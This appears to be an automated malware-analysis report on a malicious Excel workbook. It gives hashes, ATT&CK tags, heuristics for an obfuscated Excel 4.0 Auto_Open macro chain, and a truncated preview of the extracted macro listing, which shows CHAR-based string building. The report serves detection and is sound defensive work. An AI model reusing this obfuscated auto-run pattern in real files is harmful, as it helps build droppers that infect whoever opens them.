Office (OLE) malware analysis — malicious · 5a27f90c1e703cdd

MALICIOUS

Office (OLE)

320.0 KB Created: 2020-05-20 11:41:46 Authoring application: Microsoft Excel First seen: 2020-08-10

MD5: c43ec3b00b236c0aab2b760648f68811 SHA-1: b4dd439c5fa98c5be9ddf2585aa5b7b82e7dd4d3 SHA-256: 5a27f90c1e703cdd4ea1e0c931bf820d2b3fd0ea66a68c3791f49ec679601ae8

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical heuristics indicate the presence of obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macro sheet contains a reference to 'RUN=32' and 'FORMULA(CHAR)=42', suggesting a deliberate attempt to obfuscate the execution flow. This pattern is commonly used to download and execute a secondary payload, making it a likely initial vector for a malicious attack. The specific formulas are truncated, preventing a full reconstruction of the execution chain.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 126277 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	126277 bytes
SHA-256: `b3b693249f790f1fa2738797e1d56a2cc2c23412a649b28a25fb1fac79ac0b70`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!HX18662 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,J187,"SET.VALUE(HS48054,-61.00000000000000000000-GET.CELL(17,HD14762))","" ' Sheet,J188,GOTO(IF20228),"" ' Sheet,BD257,"",-270.00000000000000000000 ' Sheet,FI258,"",0.37142857142857144126 ' Sheet,GT281,"",-3.00000000000000000000 ' Sheet,GT381,"",3.02586206896551734857 ' Sheet,HQ433,"",-3.75000000000000000000 ' Sheet,EG477,"",1.40000000000000568434 ' Sheet,BJ499,"",-328.00000000000000000000 ' Sheet,IO517,"",0.78681318681318679342 ' Sheet,IN607,"",8.18181918181818090829 ' Sheet,CY638,"",304.00000000000000000000 ' Sheet,HS679,"",0.18000015258789062167 ' Sheet,U725,"",194.00000000000000000000 ' Sheet,BI772,"",0.82857142857142862535 ' Sheet,HW797,"",-71.00000000000000000000 ' Sheet,JI827,"",-83.20007812500000454747 ' Sheet,H851,"",6.59999999999999431566 ' Sheet,DI864,"",0.07039337474120083149 ' Sheet,ES871,"",5.52173913043478226115 ' Sheet,DV881,"",0.16499999999999998002 ' Sheet,HZ889,"",0.69832402234636881122 ' Sheet,FC913,"",-4.02985074626865635850 ' Sheet,GU970,"",-0.24444444444444443643 ' Sheet,GE1024,"",4.88888888888888928363 ' Sheet,JG1052,"",-83.00000000000000000000 ' Sheet,GS1122,"",8.30612244897959151047 ' Sheet,ED1204,"",96.00000000000000000000 ' Sheet,EZ1303,"",1.78999999999999981348 ' Sheet,FK1309,"FORMULA(CHAR(HB21637/FQ52175)&CHAR(FE25847/HG51924)&CHAR(JR13138GS39291)&CHAR(DW46902BI772)&CHAR(JR13138+EL25046)&CHAR(JR13138/JR56430)&CHAR(DX59636+EJ33923)&CHAR(DX59636+EK46130)&CHAR(FE25847-EY41710)&CHAR(EO50768/HI29289)&CHAR(DW46902/GD58682)&CHAR(HB21637-J47525)&CHAR(DX59636CD42963)&CHAR(HB21637IA13258)&CHAR(DX59636+HT39959)&CHAR(FG19752CG27104)&CHAR(HB21637HQ20856)&CHAR(S11355/GN59704)&CHAR(EO50768/X28394)&CHAR(S11355/BN62490)&CHAR(FE25847/BM30351)&CHAR(JR13138+BD257)&CHAR(JK35475-GL5554)&CHAR(EO50768CA39159)&CHAR(IB39123+DC33830)&CHAR(DW46902+Y1840)&CHAR(DW46902CE10161)&CHAR(FE25847BG43375)&CHAR(JR13138/JR36624)&CHAR(JR13138/CW28899)&CHAR(JR13138+GX14274)&CHAR(FG19752HG41674)&CHAR(DW46902+FY27826)&CHAR(DW46902-DF38462)&CHAR(JK35475HB26524)&CHAR(JK35475-DW22705)&CHAR(DX59636DZ52024)&CHAR(JR13138+HV30585)&CHAR(JR13138+HW63238)&CHAR(FG19752+EJ63674)&CHAR(S11355+GI36019)&CHAR(DX59636+DS30936)&CHAR(JK35475IQ46525)&CHAR(JK35475-FX63173)&CHAR(EO50768/FO64388)&CHAR(HB21637CN45689)&CHAR(EO50768CC25872)&CHAR(JK35475/GJ39852)&CHAR(HB21637-HJ62051)&CHAR(JR13138/GP8370)&CHAR(JR13138/EL41952)&CHAR(S11355-J35598)&CHAR(DW46902-JD13701)&CHAR(DX59636+GG4519)&CHAR(JK35475ID50783)&CHAR(HB21637ET33405)&CHAR(FE25847-CQ2551)&CHAR(JK35475+FR40362)&CHAR(FE25847JG35537)&CHAR(JR13138+FD31343)&CHAR(DW46902+FS39324)&CHAR(FE25847DE41827)&CHAR(S11355+EI21456)&CHAR(JK35475EU13691)&CHAR(DX59636/DF4397)&CHAR(JK35475+IE4915)&CHAR(HB21637+EH5564)&CHAR(FE25847-W44098)&CHAR(EO50768+G25806)&CHAR(HB21637A60827)&CHAR(FG19752+HE45115)&CHAR(EO50768-EP46671)&CHAR(FG19752/BI19997)&CHAR(JK35475BU42680)&CHAR(FG19752/ID45845)&CHAR(IB39123FJ14393)&CHAR(FE25847-EP43033)&CHAR(S11355+DW11757)&CHAR(FG19752/JC23705)&CHAR(EO50768CK52834)&CHAR(FE25847*DX17983),CF21656)","" ' Sheet,FK1310,GOTO(JS7546),"" ' Sheet,GV1394,"",-92.00000000000000000000 ' Sheet,GN1419,"",0.24815724815724815588 ' Sheet,GP1423,"",-6.85714285714285676221 ' Sheet,CX1487,"",562.00000000000000000000 ' Sheet,FG1491,"",2.72189349112426048904 ' Sheet,IW1500,"",1.16666666666666674068 ' Sheet,FL1520,"",172.00000000000000000000 ' Sheet,CR1539,"",302.00000000000000000000 ' Sheet,GY1591,"",0.12629399585921324833 ' Sheet,JF1609,"",-27.40000000000000568434 ' Sheet,GU1614,"",-1.34666666666666667851 ' Sheet,CT1651,"",0.06734593877551020569 ' Sheet,N1653,"" ... (truncated)

SHA-256: b3b693249f790f1fa2738797e1d56a2cc2c23412a649b28a25fb1fac79ac0b70

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!HX18662 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,J187,"SET.VALUE(HS48054,-61.00000000000000000000-GET.CELL(17,HD14762))",""
'  Sheet,J188,GOTO(IF20228),""
'  Sheet,BD257,"",-270.00000000000000000000
'  Sheet,FI258,"",0.37142857142857144126
'  Sheet,GT281,"",-3.00000000000000000000
'  Sheet,GT381,"",3.02586206896551734857
'  Sheet,HQ433,"",-3.75000000000000000000
'  Sheet,EG477,"",1.40000000000000568434
'  Sheet,BJ499,"",-328.00000000000000000000
'  Sheet,IO517,"",0.78681318681318679342
'  Sheet,IN607,"",8.18181918181818090829
'  Sheet,CY638,"",304.00000000000000000000
'  Sheet,HS679,"",0.18000015258789062167
'  Sheet,U725,"",194.00000000000000000000
'  Sheet,BI772,"",0.82857142857142862535
'  Sheet,HW797,"",-71.00000000000000000000
'  Sheet,JI827,"",-83.20007812500000454747
'  Sheet,H851,"",6.59999999999999431566
'  Sheet,DI864,"",0.07039337474120083149
'  Sheet,ES871,"",5.52173913043478226115
'  Sheet,DV881,"",0.16499999999999998002
'  Sheet,HZ889,"",0.69832402234636881122
'  Sheet,FC913,"",-4.02985074626865635850
'  Sheet,GU970,"",-0.24444444444444443643
'  Sheet,GE1024,"",4.88888888888888928363
'  Sheet,JG1052,"",-83.00000000000000000000
'  Sheet,GS1122,"",8.30612244897959151047
'  Sheet,ED1204,"",96.00000000000000000000
'  Sheet,EZ1303,"",1.78999999999999981348
'  Sheet,FK1309,"FORMULA(CHAR(HB21637/FQ52175)&CHAR(FE25847/HG51924)&CHAR(JR13138*GS39291)&CHAR(DW46902*BI772)&CHAR(JR13138+EL25046)&CHAR(JR13138/JR56430)&CHAR(DX59636+EJ33923)&CHAR(DX59636+EK46130)&CHAR(FE25847-EY41710)&CHAR(EO50768/HI29289)&CHAR(DW46902/GD58682)&CHAR(HB21637-J47525)&CHAR(DX59636*CD42963)&CHAR(HB21637*IA13258)&CHAR(DX59636+HT39959)&CHAR(FG19752*CG27104)&CHAR(HB21637*HQ20856)&CHAR(S11355/GN59704)&CHAR(EO50768/X28394)&CHAR(S11355/BN62490)&CHAR(FE25847/BM30351)&CHAR(JR13138+BD257)&CHAR(JK35475-GL5554)&CHAR(EO50768*CA39159)&CHAR(IB39123+DC33830)&CHAR(DW46902+Y1840)&CHAR(DW46902*CE10161)&CHAR(FE25847*BG43375)&CHAR(JR13138/JR36624)&CHAR(JR13138/CW28899)&CHAR(JR13138+GX14274)&CHAR(FG19752*HG41674)&CHAR(DW46902+FY27826)&CHAR(DW46902-DF38462)&CHAR(JK35475*HB26524)&CHAR(JK35475-DW22705)&CHAR(DX59636*DZ52024)&CHAR(JR13138+HV30585)&CHAR(JR13138+HW63238)&CHAR(FG19752+EJ63674)&CHAR(S11355+GI36019)&CHAR(DX59636+DS30936)&CHAR(JK35475*IQ46525)&CHAR(JK35475-FX63173)&CHAR(EO50768/FO64388)&CHAR(HB21637*CN45689)&CHAR(EO50768*CC25872)&CHAR(JK35475/GJ39852)&CHAR(HB21637-HJ62051)&CHAR(JR13138/GP8370)&CHAR(JR13138/EL41952)&CHAR(S11355-J35598)&CHAR(DW46902-JD13701)&CHAR(DX59636+GG4519)&CHAR(JK35475*ID50783)&CHAR(HB21637*ET33405)&CHAR(FE25847-CQ2551)&CHAR(JK35475+FR40362)&CHAR(FE25847*JG35537)&CHAR(JR13138+FD31343)&CHAR(DW46902+FS39324)&CHAR(FE25847*DE41827)&CHAR(S11355+EI21456)&CHAR(JK35475*EU13691)&CHAR(DX59636/DF4397)&CHAR(JK35475+IE4915)&CHAR(HB21637+EH5564)&CHAR(FE25847-W44098)&CHAR(EO50768+G25806)&CHAR(HB21637*A60827)&CHAR(FG19752+HE45115)&CHAR(EO50768-EP46671)&CHAR(FG19752/BI19997)&CHAR(JK35475*BU42680)&CHAR(FG19752/ID45845)&CHAR(IB39123*FJ14393)&CHAR(FE25847-EP43033)&CHAR(S11355+DW11757)&CHAR(FG19752/JC23705)&CHAR(EO50768*CK52834)&CHAR(FE25847*DX17983),CF21656)",""
'  Sheet,FK1310,GOTO(JS7546),""
'  Sheet,GV1394,"",-92.00000000000000000000
'  Sheet,GN1419,"",0.24815724815724815588
'  Sheet,GP1423,"",-6.85714285714285676221
'  Sheet,CX1487,"",562.00000000000000000000
'  Sheet,FG1491,"",2.72189349112426048904
'  Sheet,IW1500,"",1.16666666666666674068
'  Sheet,FL1520,"",172.00000000000000000000
'  Sheet,CR1539,"",302.00000000000000000000
'  Sheet,GY1591,"",0.12629399585921324833
'  Sheet,JF1609,"",-27.40000000000000568434
'  Sheet,GU1614,"",-1.34666666666666667851
'  Sheet,CT1651,"",0.06734593877551020569
'  Sheet,N1653,""
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.